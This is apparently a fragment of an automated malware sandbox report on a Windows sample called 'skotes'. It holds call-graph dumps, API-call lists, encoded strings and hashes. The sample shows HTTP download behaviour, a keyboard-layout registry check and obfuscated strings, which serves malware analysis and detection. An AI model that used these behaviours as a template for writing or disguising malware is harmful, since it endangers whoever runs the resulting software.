35363->35364 35365 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35364->35365 35366 40e7f2 35365->35366 35367 40be30 12 API calls 35366->35367 35368 40e7fe 35367->35368 35369 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35368->35369 35370 40e813 35369->35370 35371 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35370->35371 35372 40e82b 35371->35372 35373 405c10 5 API calls 35372->35373 35374 40e832 35373->35374 35375 408580 2 API calls 35374->35375 35376 40e83e 35375->35376 35377 40ea8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35376->35377 35378 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35376->35378 35377->35250 35379 40eabd 35378->35379 35380 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35379->35380 35381 40eac2 35380->35381 35382 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35381->35382 35383 40eb19 35382->35383 35384 405c10 5 API calls 35383->35384 35385 40eb21 35384->35385 35386 4183c0 2 API calls 35385->35386 35387 40eb36 35386->35387 35388 418220 2 API calls 35387->35388 35389 40eb45 GetFileAttributesA 35388->35389 35391 40eb62 35389->35391 35392 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35391->35392 35393 40ed60 35392->35393 35394 405c10 5 API calls 35393->35394 35395 40ed68 35394->35395 35396 4183c0 2 API calls 35395->35396 35397 40ed7d 35396->35397 35398 418220 2 API calls 35397->35398 35399 40ed8c GetFileAttributesA 35398->35399 35403 40eda9 35399->35403 35401 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35401->35403 35402 40f699 Concurrency::details::ResourceManager::Release 35402->35250 35403->35401 35403->35402 35404 40f6cb 35403->35404 35405 436c6a 
Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35404->35405 35406 40f6d0 35405->35406 35407 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35406->35407 35408 40f727 35407->35408 35409 405c10 5 API calls 35408->35409 35410 40f72e 35409->35410 35411 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35410->35411 35412 40f741 35411->35412 35413 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35412->35413 35414 40f756 35413->35414 35415 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35414->35415 35416 40f76b 35415->35416 35417 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35416->35417 35418 40f77d 35417->35418 35419 40e530 12 API calls 35418->35419 35420 40f786 35419->35420 35421 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35420->35421 35422 40f7aa 35421->35422 35423 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35422->35423 35424 40f7ba 35423->35424 35425 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35424->35425 35426 40f7d7 35425->35426 35427 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35426->35427 35429 40f7f0 35427->35429 35428 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35428->35250 35429->35428 35430 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35429->35430 35431 40f9b0 35430->35431 35432 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35431->35432 35433 40fa04 35432->35433 35434 405c10 5 API calls 35433->35434 35435 40fa0b 35434->35435 35436 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35435->35436 35437 40fa1e 
35436->35437 35438 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35437->35438 35439 40fa33 35438->35439 35440 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35439->35440 35441 40fa48 35440->35441 35442 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35441->35442 35443 40fa5a 35442->35443 35444 40e530 12 API calls 35443->35444 35446 40fa63 35444->35446 35445 40fb35 Concurrency::details::ResourceManager::Release 35445->35250 35446->35445 35447 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35446->35447 35448 40fb54 35447->35448 35449 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35448->35449 35450 40fba5 35449->35450 35541 409580 5 API calls 3 library calls 35450->35541 35452 40fbb4 35542 409230 5 API calls 3 library calls 35452->35542 35454 40fbc3 35455 418320 2 API calls 35454->35455 35456 40fbdb 35455->35456 35456->35456 35457 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35456->35457 35458 40fc8c 35457->35458 35459 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35458->35459 35460 40fca7 35459->35460 35461 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35460->35461 35462 40fcb9 35461->35462 35543 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35462->35543 35464 40fcc2 35465 436729 RtlAllocateHeap 35464->35465 35466 40fce1 35465->35466 35467 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35466->35467 35468 4105d4 35467->35468 35469 405c10 5 API calls 35468->35469 35470 4105db 35469->35470 35471 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35470->35471 
35472 4105f1 35471->35472 35473 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35472->35473 35474 410609 35473->35474 35475 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35474->35475 35476 410621 35475->35476 35477 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35476->35477 35478 410633 35477->35478 35479 40e530 12 API calls 35478->35479 35481 41063c 35479->35481 35480 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35480->35250 35481->35480 35482 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35481->35482 35483 4108d3 35482->35483 35484 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35483->35484 35485 410987 35484->35485 35486 405c10 5 API calls 35485->35486 35487 41098e 35486->35487 35488 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35487->35488 35489 4109a4 35488->35489 35490 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35489->35490 35491 4109bc 35490->35491 35492 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35491->35492 35493 4109d4 35492->35493 35494 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35493->35494 35495 4112e0 35494->35495 35496 40e530 12 API calls 35495->35496 35497 4112e9 35496->35497 35498->35282 35499->35284 35501 418339 35500->35501 35502 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35501->35502 35503 41834d __InternalCxxFrameHandler 35501->35503 35502->35503 35503->35286 35504->35294 35544 436672 35505->35544 35507 40fce1 35507->35297 35510 41777b 35508->35510 35521 417864 Concurrency::details::ResourceManager::Release std::_Rethrow_future_exception 35508->35521 35509 4178f1 35537 419270 RtlAllocateHeap 
RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 35509->35537 35510->35509 35513 417811 35510->35513 35514 4177ea 35510->35514 35520 4177fb std::_Rethrow_future_exception 35510->35520 35510->35521 35512 4178f6 35538 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 35512->35538 35518 41d3e2 ListArray 2 API calls 35513->35518 35513->35520 35514->35512 35517 41d3e2 ListArray 2 API calls 35514->35517 35516 4178fb 35517->35520 35518->35520 35519 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35519->35509 35520->35519 35520->35521 35521->35330 35523 418f6b 35522->35523 35524 41908e 35522->35524 35527 418fb2 35523->35527 35528 418fdc 35523->35528 35539 419270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 35524->35539 35526 419093 35540 402480 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback 35526->35540 35527->35526 35530 418fbd 35527->35530 35533 41d3e2 ListArray 2 API calls 35528->35533 35535 418fc3 std::_Rethrow_future_exception 35528->35535 35532 41d3e2 ListArray 2 API calls 35530->35532 35531 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35534 41909d 35531->35534 35532->35535 35533->35535 35535->35531 35536 41904c Concurrency::details::ResourceManager::Release std::_Rethrow_future_exception 35535->35536 35536->35331 35538->35516 35540->35535 35541->35452 35542->35454 35543->35464 35547 43667e ___scrt_is_nonwritable_in_current_image 35544->35547 35545 436685 35546 4375f6 __dosmaperr RtlAllocateHeap 35545->35546 35548 43668a 35546->35548 35547->35545 35549 4366a5 35547->35549 35562 436c5a RtlAllocateHeap ___std_exception_copy 35548->35562 35551 4366b7 35549->35551 35552 4366aa 35549->35552 35558 
43a8c3 35551->35558 35553 4375f6 __dosmaperr RtlAllocateHeap 35552->35553 35557 436695 35553->35557 35555 4366c0 35556 4375f6 __dosmaperr RtlAllocateHeap 35555->35556 35555->35557 35556->35557 35557->35507 35559 43a8cf ___scrt_is_nonwritable_in_current_image _unexpected 35558->35559 35563 43a967 35559->35563 35561 43a8ea 35561->35555 35562->35557 35564 43a98a ___scrt_uninitialize_crt 35563->35564 35565 43d82f _unexpected RtlAllocateHeap 35564->35565 35568 43a9d0 ___scrt_uninitialize_crt __wsopen_s 35564->35568 35566 43a9eb 35565->35566 35569 43adf5 RtlAllocateHeap __dosmaperr 35566->35569 35568->35561 35569->35568 35570 40eb4e 35571 40eb50 GetFileAttributesA 35570->35571 35572 40eb62 35571->35572 35573 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35572->35573 35574 40ed60 35573->35574 35575 405c10 5 API calls 35574->35575 35576 40ed68 35575->35576 35577 4183c0 2 API calls 35576->35577 35578 40ed7d 35577->35578 35579 418220 2 API calls 35578->35579 35580 40ed8c GetFileAttributesA 35579->35580 35584 40eda9 35580->35584 35582 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35582->35584 35583 40f699 Concurrency::details::ResourceManager::Release 35584->35582 35584->35583 35585 40f6cb 35584->35585 35586 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35585->35586 35587 40f6d0 35586->35587 35588 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35587->35588 35589 40f727 35588->35589 35590 405c10 5 API calls 35589->35590 35591 40f72e 35590->35591 35592 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35591->35592 35593 40f741 35592->35593 35594 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35593->35594 35595 40f756 35594->35595 35596 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35595->35596 35597 40f76b 35596->35597 
35598 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35597->35598 35599 40f77d 35598->35599 35600 40e530 14 API calls 35599->35600 35601 40f786 35600->35601 35602 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35601->35602 35603 40f7aa 35602->35603 35604 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35603->35604 35605 40f7ba 35604->35605 35606 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35605->35606 35607 40f7d7 35606->35607 35608 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35607->35608 35610 40f7f0 35608->35610 35609 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35610->35609 35611 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35610->35611 35612 40f9b0 35611->35612 35613 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35612->35613 35614 40fa04 35613->35614 35615 405c10 5 API calls 35614->35615 35616 40fa0b 35615->35616 35617 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35616->35617 35618 40fa1e 35617->35618 35619 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35618->35619 35620 40fa33 35619->35620 35621 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35620->35621 35622 40fa48 35621->35622 35623 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35622->35623 35624 40fa5a 35623->35624 35625 40e530 14 API calls 35624->35625 35627 40fa63 35625->35627 35626 40fb35 Concurrency::details::ResourceManager::Release 35627->35626 35628 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35627->35628 35629 40fb54 35628->35629 35630 417a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35629->35630 35631 40fba5 35630->35631 35679 409580 5 API calls 3 library calls 35631->35679 35633 40fbb4 35680 409230 5 API calls 3 library calls 35633->35680 35635 40fbc3 35636 418320 2 API calls 35635->35636 35637 40fbdb 35636->35637 35637->35637 35638 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35637->35638 35639 40fc8c 35638->35639 35640 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35639->35640 35641 40fca7 35640->35641 35642 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35641->35642 35643 40fcb9 35642->35643 35681 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35643->35681 35645 40fcc2 35646 436729 RtlAllocateHeap 35645->35646 35647 40fce1 35646->35647 35648 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35647->35648 35649 4105d4 35648->35649 35650 405c10 5 API calls 35649->35650 35651 4105db 35650->35651 35652 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35651->35652 35653 4105f1 35652->35653 35654 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35653->35654 35655 410609 35654->35655 35656 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35655->35656 35657 410621 35656->35657 35658 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35657->35658 35659 410633 35658->35659 35660 40e530 14 API calls 35659->35660 35662 41063c 35660->35662 35661 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35662->35661 35663 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1F$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                              • API String ID: 0-2926265604
                                                                                                                                              • Opcode ID: bac1dd4df0fb1573bc50b65381342e9a7e2c937a3169c0d58a0e9dfd3b1fa0c8
                                                                                                                                              • Instruction ID: 47c55a489a56fd91da712c144115dba593d28085047fb63452a4b418cb6bcc46
                                                                                                                                              • Opcode Fuzzy Hash: bac1dd4df0fb1573bc50b65381342e9a7e2c937a3169c0d58a0e9dfd3b1fa0c8
                                                                                                                                              • Instruction Fuzzy Hash: 9E82E6709042889BEF14EF68C9497CE7FB1AF46308F50859EE805273C2D7795A88CBD6

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040EB51
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000), ref: 0040EC83
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040ED98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile$CreateDirectory
                                                                                                                                              • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$L1F$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                              • API String ID: 1875963930-1066624543
                                                                                                                                              • Opcode ID: fd78a48f2d9298efe8b2665af4bdcb7e5dfe66d0e6c56e4044bdb798a3af0ca3
                                                                                                                                              • Instruction ID: c4289d7ab0428a9c126637435df8ddf0f53f61d8460e47a0678dc4ff6c657b83
                                                                                                                                              • Opcode Fuzzy Hash: fd78a48f2d9298efe8b2665af4bdcb7e5dfe66d0e6c56e4044bdb798a3af0ca3
                                                                                                                                              • Instruction Fuzzy Hash: E4F25E71A001449BEF18DB38CD897DD7B729F82304F1481AEE409A73D6DB7D9AC48B99

                                                                                                                                              Control-flow Graph (graph not reproduced; starts at 40be30)
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(000005DC,EBA58D57,?,00000000), ref: 0040BEB8
                                                                                                                                              • InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC8
                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEC
                                                                                                                                              • HttpOpenRequestA.WININET(?,00000000), ref: 0040BF36
                                                                                                                                              • HttpSendRequestA.WININET(?,00000000), ref: 0040BFF6
                                                                                                                                              • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A8
                                                                                                                                              • InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 0040C161
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C187
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C18F
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040C197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                                                              • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                              • API String ID: 1439999335-885246636
                                                                                                                                              • Opcode ID: 1518eb687004853efa29c5db6eb4ac80e37a3f0bc210497c56dc98a92a7baf35
                                                                                                                                              • Instruction ID: f4929b86adc9e75eb2c0190ee11448700fde9bf918225e6129556df98cebc324
                                                                                                                                              • Opcode Fuzzy Hash: 1518eb687004853efa29c5db6eb4ac80e37a3f0bc210497c56dc98a92a7baf35
                                                                                                                                              • Instruction Fuzzy Hash: BFB1C2B1A10118DBDB24CF28CC84B9E7A65EF45304F5042AEF909A72D1D7789AC4CB99

                                                                                                                                              Control-flow Graph (graph not reproduced; starts at 406020)
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D
                                                                                                                                              • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00406271
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumOpenValue
                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                              • API String ID: 2571532894-3963862150
                                                                                                                                              • Opcode ID: a602cd8e7b0850ab84259d6aa7908dd137ddacf594454c55420b387fbbdb9bc7
                                                                                                                                              • Instruction ID: b72d8befcf04fcbf28a2d64e6541736625970e2e987c40f142a0de41feeda528
                                                                                                                                              • Opcode Fuzzy Hash: a602cd8e7b0850ab84259d6aa7908dd137ddacf594454c55420b387fbbdb9bc7
                                                                                                                                              • Instruction Fuzzy Hash: A1B1C171900168ABDB24DB14CC84BDEB7B9AF05304F5402EAE509F72D1DB785BE88F58

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                              • API String ID: 1721193555-3123340372
                                                                                                                                              • Opcode ID: 5a3a65f84bd1e4191d0a422afb85bbe076af315937cb0c2cc4c5e6db1b321f7a
                                                                                                                                              • Instruction ID: 9f7ef5bd834e15217ce0e6cbf456c9b0ec5c4a66442bea978885161577b3df54
                                                                                                                                              • Opcode Fuzzy Hash: 5a3a65f84bd1e4191d0a422afb85bbe076af315937cb0c2cc4c5e6db1b321f7a
                                                                                                                                              • Instruction Fuzzy Hash: C4E12B70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE815773C2DB7D4E858BCB

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1651 441abc-441aec call 44180a 1654 441b07-441b13 call 43bf3a 1651->1654 1655 441aee-441af9 call 4375e3 1651->1655 1661 441b15-441b2a call 4375e3 call 4375f6 1654->1661 1662 441b2c-441b75 call 441775 1654->1662 1660 441afb-441b02 call 4375f6 1655->1660 1671 441de1-441de5 1660->1671 1661->1660 1669 441b77-441b80 1662->1669 1670 441be2-441beb GetFileType 1662->1670 1673 441bb7-441bdd call 4375c0 1669->1673 1674 441b82-441b86 1669->1674 1675 441c34-441c37 1670->1675 1676 441bed-441c1e call 4375c0 1670->1676 1673->1660 1674->1673 1678 441b88-441bb5 call 441775 1674->1678 1679 441c40-441c46 1675->1679 1680 441c39-441c3e 1675->1680 1676->1660 1698 441c24-441c2f call 4375f6 1676->1698 1678->1670 1678->1673 1683 441c4a-441c98 call 43be85 1679->1683 1684 441c48 1679->1684 1680->1683 1693 441cb7-441cdf call 441522 1683->1693 1694 441c9a-441ca6 call 441984 1683->1694 1684->1683 1702 441ce4-441d25 1693->1702 1703 441ce1-441ce2 1693->1703 1694->1693 1704 441ca8 1694->1704 1698->1660 1707 441d46-441d54 1702->1707 1708 441d27-441d2b 1702->1708 1705 441caa-441cb2 call 43af48 1703->1705 1704->1705 1705->1671 1711 441ddf 1707->1711 1712 441d5a-441d5e 1707->1712 1708->1707 1710 441d2d-441d41 1708->1710 1710->1707 1711->1671 1712->1711 1714 441d60-441d93 call 441775 1712->1714 1718 441d95-441dc1 call 4375c0 call 43c04d 1714->1718 1719 441dc7-441ddb 1714->1719 1718->1719 1719->1711
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00441775: CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441BD7
                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00441BE3
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441BF6
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00441D9C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __dosmaperr$File$CreateType
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 3443242726-2852464175
                                                                                                                                              • Opcode ID: ebdf73e1a1382703fb9d80047de4564698e7f95763cdb7ee6f48313eba281093
                                                                                                                                              • Instruction ID: f555276e453fe840cb4f526367cb36602bd9df184fa0eefa914a177282c6a8e2
                                                                                                                                              • Opcode Fuzzy Hash: ebdf73e1a1382703fb9d80047de4564698e7f95763cdb7ee6f48313eba281093
                                                                                                                                              • Instruction Fuzzy Hash: 7CA14972A041489FDF19DF68DC91BAE3BA1AB0A324F15015EE811AB3E1D7389D42C75A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
